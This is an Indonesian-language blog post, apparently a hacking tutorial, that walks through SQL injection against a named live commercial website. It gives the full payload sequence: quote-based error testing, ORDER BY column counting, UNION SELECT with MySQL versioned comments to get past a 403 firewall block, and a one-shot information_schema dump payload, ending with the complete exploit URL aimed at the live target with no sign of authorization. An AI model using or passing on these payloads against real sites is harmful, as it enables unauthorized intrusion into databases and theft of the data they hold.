Search

SQL Injection + Bypass 403 Forbidden


Sedikit catatan, saya bukan master yg bisa segalanya, hanya ingin membagi ilmu yg saya punya selama ini.

Hal yg diperlukan
- Kuota
- Dios

Live Target
https://www.teddyhouse.com/help.php?id=2

• PoC
1. Cek dulu tu targetnya error atau ga dengan nambahin kutip atas (') di akhir parameter. (Lihat Screenshot)

Sebelum dikasih parameter
Sesudah dikasih parameter

Habis itu kita cari column yg error nya dengan nambahin

+order+by+angka--+- (misal: +order+by+1--+-)

(Note : jika column ga ketemu error padahal udah sampe 100+ angka pake yg dibawah)

' order by angka-- - (misal: ' order by 1-- -)

' order by 1-- - (Web Normal)
' order by 2-- - (Web Normal)
' order by 3-- - (Web Normal)
' order by 4-- - (Web Normal)
Skip
' order by 14-- - (Web Normal)
' order by 15-- - (Web Normal)
' order by 16-- - (Web Error)

Note : Error seperti ditambah parameter

2. Tambahkan +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+-

atau

' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -

Nah, disini nih kadang ada yg tulisan 403 forbidden



Masukin union selectnya seperti ini

' /*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -

Ga muncul angka ajaibnya? Tambahin - (strip) di depan angka parameter.

Contoh :
Normal
index.php?id=2
Tambah -
index.php?id=-2

Sampai sini paham kan??

Nah, tinggal ganti aja tu angka error sama dios.

Nih diosnya.

make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

Hasil akhirnya seperti ini.

Website
https://www.teddyhouse.com/help.php?id=-2%27%20/*!50000union*/%20/*!50000select*/%201,2,3,4,5,6,7,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),9,10,11,12,13,14,15--%20-

Screenshot

Ga paham sama tutor gajelas ini?

Hubungi saya brokuh click

Thanks for visit.
See you next blog.

Post a Comment

0 Comments